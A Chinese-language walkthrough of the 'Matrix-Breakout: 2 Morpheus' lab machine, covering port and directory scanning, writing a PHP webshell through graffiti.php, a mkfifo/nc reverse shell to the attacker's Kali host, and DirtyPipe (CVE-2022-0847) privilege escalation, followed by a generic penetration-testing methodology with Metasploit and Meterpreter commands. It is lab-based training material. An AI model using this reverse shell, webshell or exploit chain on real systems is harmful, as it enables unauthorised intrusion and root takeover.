Matrix-Breakout: 2 Morpheus渗透记录

靶场环境:

kali:192.168.10.135 NAT模式

靶机:192.168.10.0/24网段 NAT模式

信息收集:

arp-scan -I eth0 -l  扫描同网段下靶机IP

nmap -sS -sV -p- -A 192.168.10.136  对靶机进行端口扫描

靶机开放了22.80和81三个端口,访问80端口

信息提示我们我们要去调查别人的电脑并获取shell

先看一下源代码中有没有线索。

源代码中没有有用信心,去访问81端口看看

访问81端口让我们登录,但是没有用户名和密码,扫描网站下有什么目录,是否能找到登录线索。

扫描出robots.txt和JavaScript目录,挨个去访问。

robots.txt提示这里没有白兔子,继续搜索。再去看另一个

这个提示我们没有权限。现在没有什么信息了,但robots.txt让我们继续搜索,换个更大的字典吧

使用gobuster中的字典进行搜寻,

先进入到字典目录 /usr/share/wordlists/dirbuster 查看字典

使用directory-list-2.3-medium.txt 这个字典进行搜索。

gobuster dir -u http://192.168.10.136/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

gobuster扫描出一个graffiti.php,访问一下。

有一个提交消息的框,burp抓个包看一看提交到哪里。

抓包后消息会提交到一个txt中,并且会在网页中显示,我们可以上传消息,测试上传的文件名称是不是可控修改文件名为1.php,输入php探针代码测试一下

提交成功,去访问1.php

访问成功,显示信息,上传一句话木马到靶机。

访问文件,使用蚁剑测试连接

添加后查看当前用户

当前是www-data用户,开始进行提权。

先反弹shell到kali

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.10.135 1234 >/tmp/f

建立交互式shell

python3 -c"import pty;pty.spawn( '/bin/bash')" 

查看一下内核版本,寻找可以利用的漏洞

searchsploit 没有找到。去搜寻一下这个版本利用的漏洞,我们找到了

GitHub - The-Z-Labs/linux-exploit-suggester: Linux privilege escalation auditing tool

将其中的sh文件通过蚁剑上传到靶机

查看文件权限,添加执行权限并启动

有很多啊可以利用的,我们利用CVE-2022-0847 进行提权,到github上找到利用的sh文件

GitHub - r1is/CVE-2022-0847: CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。 CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”

利用蚁剑将文件上传,添加执行权限并启动。

执行脚本后,我们就获取了root权限就可以找到flag

Matrix-Breakout-2-Morpheus靶机进行渗透测试是一项复杂且具有挑战性的任务。渗透测试的目的是通过模拟黑客的攻击手段,评估系统的安全性并发现潜在的安全漏洞。以下是进行渗透测试的一般步骤和方法: ### 1. 信息收集(Reconnaissance) 在开始渗透测试之前,首先需要进行信息收集。信息收集的目的是尽可能多地了解目标系统,包括操作系统类型、开放端口、服务版本等。 - **使用Nmap扫描端口**:Nmap是一个强大的网络扫描工具,可以扫描目标系统的开放端口和服务。 ```sh nmap -sS -sV -O <目标IP> ``` - **使用Nikto扫描Web漏洞**:Nikto是一个Web服务器扫描工具,可以扫描常见的Web漏洞。 ```sh nikto -h <目标IP> ``` ### 2. 漏洞扫描(Vulnerability Scanning) 在信息收集的基础上,进行漏洞扫描,识别系统中的已知漏洞。 - **使用OpenVAS进行漏洞扫描**:OpenVAS是一个开源的漏洞扫描工具,可以自动扫描系统中的漏洞。 ```sh openvas-scan <目标IP> ``` ### 3. 漏洞利用(Exploitation) 一旦识别出系统中的漏洞,就可以尝试利用这些漏洞来获取系统的访问权限。 - **使用Metasploit进行漏洞利用**:Metasploit是一个流行的渗透测试框架,提供了大量的漏洞利用模块。 ```sh msfconsole use exploit/<模块名称> set RHOST <目标IP> set PAYLOAD <有效载荷> exploit ``` ### 4. 权限提升(Privilege Escalation) 获取系统访问权限后,通常需要提升权限以获得更高的访问级别。 - **使用本地提权工具**:例如,Linux系统中的`sudo -l`命令可以查看当前用户可以执行的命令,Windows系统中的`whoami /priv`命令可以查看当前用户的权限。 ### 5. 后渗透操作(Post-Exploitation) 在获取系统权限后,可以进行后渗透操作,例如数据窃取、系统破坏等。 - **使用Meterpreter进行后渗透操作**:Meterpreter是Metasploit中的一个后渗透模块,提供了丰富的功能。 ```sh meterpreter > sysinfo meterpreter > download <文件路径> ``` ### 6. 报告(Reporting) 最后,生成渗透测试报告,详细记录测试过程中发现的问题和漏洞,并提出修复建议。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值